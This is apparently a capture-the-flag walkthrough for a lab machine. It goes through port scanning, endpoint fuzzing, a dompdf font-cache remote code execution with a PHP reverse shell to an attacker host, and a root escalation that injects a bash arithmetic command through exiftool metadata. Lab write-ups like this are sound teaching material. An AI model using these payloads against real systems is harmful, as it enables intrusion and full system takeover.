Scanning

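# Quote the grep pattern and sed expression (an unquoted ^[0-9] is a glob the shell may expand against the cwd),
# and skip the service scan when the full-port sweep found nothing, otherwise nmap is called with an empty -p list.
> TARGET=10.10.11.200 && PORTS=$(nmap -p- --min-rate=1000 -T4 -Pn "$TARGET" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//') && [[ -n "$PORTS" ]] && nmap -p"$PORTS" -sC -sV -Pn -vvv "$TARGET" -oN nmap_tcp_all.nmap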

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site Maintenance
  • Domain: interface.htb
  • Found a second vhost, prd.m.rendering-api.interface.htb, in the Content-Security-Policy response header (connect-src) below — add both names to /etc/hosts before fuzzing it
curl -i http://interface.htb/
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 22 Feb 2023 00:26:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6359
Connection: keep-alive
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
X-Powered-By: Next.js
ETag: "i8ubiadkff4wf"
Vary: Accept-Encoding
  • dirsearch
> dirsearch -u http://prd.m.rendering-api.interface.htb -x 404
[19:33:04] 403 -   15B  - /composer.lock
[19:33:04] 403 -   15B  - /composer.json
[19:33:48] 200 -    0B  - /vendor/composer/autoload_classmap.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_namespaces.php
[19:33:48] 200 -    0B  - /vendor/autoload.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_psr4.php
[19:33:48] 200 -    0B  - /vendor/composer/ClassLoader.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_real.php
[19:33:48] 200 -    0B  - /vendor/composer/autoload_static.php
[19:33:48] 403 -   15B  - /vendor/composer/LICENSE
[19:33:48] 403 -   15B  - /vendor/composer/installed.json

> dirsearch -u http://prd.m.rendering-api.interface.htb/vendor/ -x 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[19:38:22] 403 -   15B  - /vendor/dompdf
[19:40:01] 403 -   15B  - /vendor/composer

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hh 0 http://prd.m.rendering-api.interface.htb/FUZZ
000000078:   404        0 L      3 W        50 Ch       "api"
000001518:   403        1 L      2 W        15 Ch       "vendor"

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hh 50 -X POST http://prd.m.rendering-api.interface.htb/api/FUZZ
000006080:   422        0 L      2 W        36 Ch       "html2pdf"

dompdf-rce: user flag

  • find api parameters
> wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"FUZZ":"test"}' --hh 36

000000145:   200        76 L     184 W      1130 Ch     "html"
  • prepare the two files below on the attacker host (the `<ip>` placeholder) and serve them over HTTP; start a listener on port 4444 (the port used in exploit_font.php) before the final curl
  • exploit.css
/* Served from the attacker host. Per the steps below, dompdf fetches this remote
   font and stores it in its font cache under
   exploitfont_normal_<md5 of the src URL>.php, so the URL here must be byte-for-byte
   the one hashed later (replace <ip> consistently in both places). */
@font-face {
    font-family:'exploitfont';
    src:url('http://<ip>/exploit_font.php');
    font-weight:'normal';
    font-style:'normal';
  }
  • exploit_font.php
<binary font data from https://github.com/positive-security/dompdf-rce/blob/main/exploit/exploit_font.php — the file starts with the PoC's font bytes (presumably so dompdf accepts it as a font) and the PHP payload below is appended after them>
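<?php /* Reverse shell: >& sends both stdout and stderr to the socket (a bare > leaves the interactive prompt and error output on the target); 0>&1 reads stdin from the same socket. */ exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/4444 0>&1'"); ?>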
  • trigger the target to load the font into cache
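# The href quotes are written as \" so they survive the single-quoted shell argument and keep the body valid JSON
# (in the original form the inner single quotes terminated the shell string instead of quoting the attribute).
> curl http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"html":"<link rel=stylesheet href=\"http://<ip>/exploit.css\">"}'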
  • compute the cache file name: the cached font is stored as `<font-family>_<weight>_<md5 of the font URL>.php`, so hash the exact src URL from exploit.css (with the real IP substituted) — the hash below is for the `<ip>` placeholder and will differ for you
> echo -n 'http://<ip>/exploit_font.php' | md5sum           
1deff7de0ba37475948a8355e7b417b8  -
  • call the cached font php to trigger the reverse shell
> curl -i http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_1deff7de0ba37475948a8355e7b417b8.php
  • get user flag in /home/dev

pe: bash arithmetic evaluation (`[[ ... -eq ... ]]`) in cleancache.sh

  • locate a script at /usr/local/sbin/cleancache.sh (presumably run by root on a schedule — the last step below waits for it)
#! /bin/bash
# Deletes files in /tmp whose PDF "Producer" metadata is dompdf.
# NOTE(review): presumably executed by root on a schedule (the writeup waits
# for it to run), which is what makes the flaw below a privilege escalation.
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
    if [[ -f "$cfile" ]]; then
        # Attacker-controlled input: any local user can drop a file in /tmp and
        # set its Producer tag with exiftool. Only the first space-delimited word
        # is kept (cut -f1), so an injected value must not contain spaces.
        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
        # VULN: -eq is an *arithmetic* comparison, so bash evaluates both
        # operands as arithmetic expressions. A value such as a[$(cmd)]+42 is an
        # array subscript whose command substitution runs with this script's
        # privileges. The string comparison that was intended,
        # [[ "$meta_producer" == "dompdf" ]], does not evaluate the value.
        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi
    fi
done
# Payload script in world-writable /dev/shm: sets the SUID bit on /bin/bash when run as root.
> printf '%s\n' 'chmod +s /bin/bash' > /dev/shm/oooo.sh
> chmod +x /dev/shm/oooo.sh

# Any regular file in /tmp is picked up by the loop; the name is arbitrary.
> touch /tmp/oooo
# Producer value that is a bash arithmetic expression: a[...] is an array
# subscript, so when [[ -eq ]] evaluates it the $(...) runs the payload with the
# script's privileges. It contains no spaces (cut -f1 would truncate it) and
# redirects the payload's output to stderr, presumably so nothing ends up inside
# the arithmetic expression.
> exiftool -Producer='a[$(/dev/shm/oooo.sh>&2)]+42' /tmp/oooo
  • wait for the exploit to run and prompt as root